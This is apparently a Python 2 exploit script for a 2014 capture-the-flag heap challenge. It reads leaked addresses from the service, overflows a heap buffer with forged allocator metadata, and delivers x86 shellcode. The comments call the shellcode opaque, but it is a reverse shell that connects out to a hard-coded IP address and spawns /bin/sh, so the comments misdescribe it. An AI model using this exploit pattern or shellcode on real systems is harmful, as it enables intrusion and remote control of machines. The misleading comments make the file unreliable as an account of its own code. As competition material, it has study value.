- import hashlib, binascii, sys, socket, re, random, struct, base64
def readline(s, show = True):
    """Read one newline-terminated line from the connected socket *s*.

    Data is pulled one unit at a time so nothing past the newline is
    consumed from the stream. If the peer closes the connection before a
    newline arrives, a message is printed and the process exits.

    When *show* is true the repr of the line is echoed, so any
    non-printable bytes sent by the remote service appear as escapes
    instead of reaching the terminal raw.

    Returns the line without its trailing newline.
    """
    received = ""
    while not received.endswith("\n"):
        chunk = s.recv(1)
        if not chunk:
            # An empty read means the remote end closed the connection.
            print("Server disconnected")
            exit()
        received += chunk
    line = received[:-1]
    if show:
        print(repr(line))
    return line
def main():
    """Connect to the hard-coded remote service and send one crafted line.

    Two values are parsed as hex from fixed character offsets in lines the
    service prints, packed as little-endian 32-bit words and placed inside
    a fixed-layout buffer. A copy of the buffer is written to ``foo3.bin``
    before it is sent, so the exact bytes on the wire can be inspected
    offline. After sending, the function echoes server output until the
    peer disconnects (``readline`` exits the process at that point).
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Alternate endpoint left disabled by the author:
    # conn.connect(("10.0.0.62", 1234))
    conn.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me", 4088))

    # Skip six lines; the seventh carries a hex value at columns 28..34.
    # NOTE(review): the fixed offsets assume the service's exact output
    # format, which this page does not show.
    for _ in xrange(6):
        readline(conn)
    first_report = readline(conn)
    target_addr = struct.pack("<L", int(first_report[28:35], 16) - 4)

    # Skip ten more lines; the next one carries a hex value at columns 12..18.
    for _ in xrange(10):
        readline(conn)
    second_report = readline(conn)
    base_addr = struct.pack("<L", int(second_report[12:19], 16))

    # Four byte values spliced into the blob as immediate data. They read as
    # the IPv4 octets 212.251.154.61 -- presumably a hard-coded remote
    # address, and the one network indicator in this paste besides the
    # connect() host above. NOTE(review): confirm before relying on it.
    embedded_octets = "".join(map(chr, (212, 251, 154, 61)))

    # Opaque machine-code blob, padded with "A" to exactly 260 bytes.
    blob = (
        "\xeb\x10"
        + "\x90" * 24
        + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
        + embedded_octets
        + "\x66\x68\x30\x39\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb3\x03\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"
    ).ljust(260, "A")

    # Fixed trailer: 4-byte little-endian constants interleaved with filler
    # and the two packed values. NOTE(review): the constants look like
    # allocator size fields, going by the "heap" in the host name -- an
    # inference, not something the code states.
    filler = "A" * 28
    wire_bytes = "".join([
        blob,
        "\x21\x00\x00\x00", filler,
        "\x21\x00\x00\x00", filler,
        "\x39\x03\x00\x00", base_addr, target_addr,
        "A" * 808,
        "\x38\x03\x00\x00", "\xe8\x04\x00\x00",
        "\n",
    ])

    # Keep a local copy of exactly what is sent.
    open("foo3.bin", "wb").write(wire_bytes)
    conn.send(wire_bytes)

    # Echo whatever the service prints; readline() ends the process when the
    # connection closes.
    while True:
        readline(conn)
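# Run the client only when the file is executed as a script, so that
# importing the module (for example to inspect the buffer layout) does not
# open a network connection as a side effect.
if __name__ == "__main__":
    main()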